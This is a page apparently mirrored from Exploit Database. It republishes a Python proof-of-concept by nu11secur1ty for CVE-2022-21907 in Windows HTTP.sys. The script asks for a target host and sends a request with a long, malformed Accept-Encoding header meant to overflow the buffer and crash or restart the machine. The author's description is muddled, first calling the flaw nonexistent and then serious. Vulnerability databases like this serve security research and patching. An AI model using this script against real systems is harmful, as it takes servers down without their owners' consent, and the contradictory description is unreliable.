Windows 10 v21H1 – HTTP Protocol Stack Remote Code Execution

• Exploit Database
• 51 阅读

• 作者： nu11secur1ty
  日期： 2023-07-07
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51575/

• ## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
  ## Author: nu11secur1ty
  ## Date: 01.14.2022
  ## Vendor: https://www.microsoft.com/
  ## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
  ## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
  ## CVE-2022-21907
  
  
  ## Description:
  NOTE: After a couple of hours of tests and experiments, I found that
  there have been no vulnerabilities, this is just a ridiculous
  experiment of Microsoft. When I decided to install the IIS packages on
  these Windows platforms, everything was ok, and everything is patched!
  Windows Server 2019, Windows 10 version 1809 - 2018 year are not
  vulnerable by default, but after I decided to upgrade from 1909 to
  2004. I found a serious problem! The Windows 10 version 2004 - 2020
  year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack
  method: buffer overflow - deny of service and restart the system. This
  problem exists, from last year which is reported on CVE-2021-31166,
  and still there! On that days I have worked on it again with the help
  and collaboration of Axel Souchet 0vercl0k the author of the idea. On
  that day, I wrote an only one-line command to exploit this
  vulnerability!
  
  [+]Exploit:
  ```python
  #!/usr/bin/python
  # Author @nu11secur1ty
  # CVE-2022-21907
  
  from colorama import init, Fore, Back, Style
  init(convert=True)
  import requests
  import time
  
  print(Fore.RED +"Please input your host...\n")
  print(Style.RESET_ALL)
  
  print(Fore.YELLOW)
  host = input()
  print(Style.RESET_ALL)
  
  print(Fore.BLUE +"Sending of especially malicious crafted packages,
  please wait...")
  print(Style.RESET_ALL)
  time.sleep(17)
  
  print(Fore.GREEN)
  # The PoC :)
  poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
  'AAAAAAAAAAAAAAAAAAAAAAAA,\
  	 BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
  	 RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
  	 TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
  	 OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
  	 ****************************stupiD, *, ,',})
  # Not necessary :)
  print(poc,"\n")
  print(Style.RESET_ALL)
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)
  
  ## Proof and Exploit
  [href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)
  
  ## Time spend:
  05:30:00